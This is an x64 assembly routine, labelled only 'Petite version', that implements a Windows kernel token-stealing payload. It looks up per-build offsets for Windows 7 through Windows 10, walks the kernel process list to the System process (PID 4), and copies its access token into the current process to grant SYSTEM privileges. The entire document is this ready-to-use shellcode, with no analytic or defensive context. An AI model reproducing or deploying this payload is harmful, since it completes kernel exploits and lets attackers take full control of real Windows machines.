Petite version ...
align 16
steal_system_token:
mov rcx,0xFFFFF780_00000000
lea rdx,[Win_Versions-4]
mov eax,[rcx+0x26C] ; nt!_KUSER_SHARED_DATA.NtMajorVersion
add eax,[rcx+0x270] ; nt!_KUSER_SHARED_DATA.NtMinorVersion
cmp eax,7
jz @F
jc .fail
add rdx,4
cmp eax,10
jc @F
jnz .fail
mov eax,[rcx+0x260] ; nt!_KUSER_SHARED_DATA.NtBuildNumber
.build_scan:
add rdx,8
cmp eax,[rdx]
jnc .build_scan
cmp dword [rdx],-1
jnz @F
.fail:
xor eax,eax
retn
@@:
movzx r9,word [rdx+4]
movzx r10,word [rdx+6]
mov rax,[gs:0x188h] ; nt!KeGetCurrentThread
mov rcx,[rax+0x220] ; nt!IoThreadToProcess
lea rax,[rcx+r9] ; ActiveProcessLinks
; Search for the System process object VA(PID 4)
@@: mov rax,[rax]
cmp qword [rax-8],4
jnz @B
sub rax,r9 ; system process object VA
mov rax,[rax+r10]
and al,0xF0
mov dl,[rcx+r10]
and dl,0x0F
add al,dl
mov [rcx+r10],rax
push 1
pop rax
retn
Win_Versions:
dw 0x0188,0x0208 ; Windows 7/Windows Server 2008 R2
dw 0x02E8,0x0348 ; Windows 8/Windows Server 2012/Windows 8.1/Windows Server 2012 R2
; assume unlisted builds between match known upstream group
; (migrate bounds as more information becomes availible)
Win10_builds:
; 10240
; 10586
; 14393
dd 14393+1
dw 0x02F0,0x0358
; 15063
; 16299
; 17134
; 17763
dd 17763+1
dw 0x02E8,0x0358
; 18362
; 18363
dd 18363+1
dw 0x02F0,0x0360
; 19041
; 19042
; 19043
; 19044
dd 19044+1
dw 0x0448,0x04B8
dd -1 ; terminator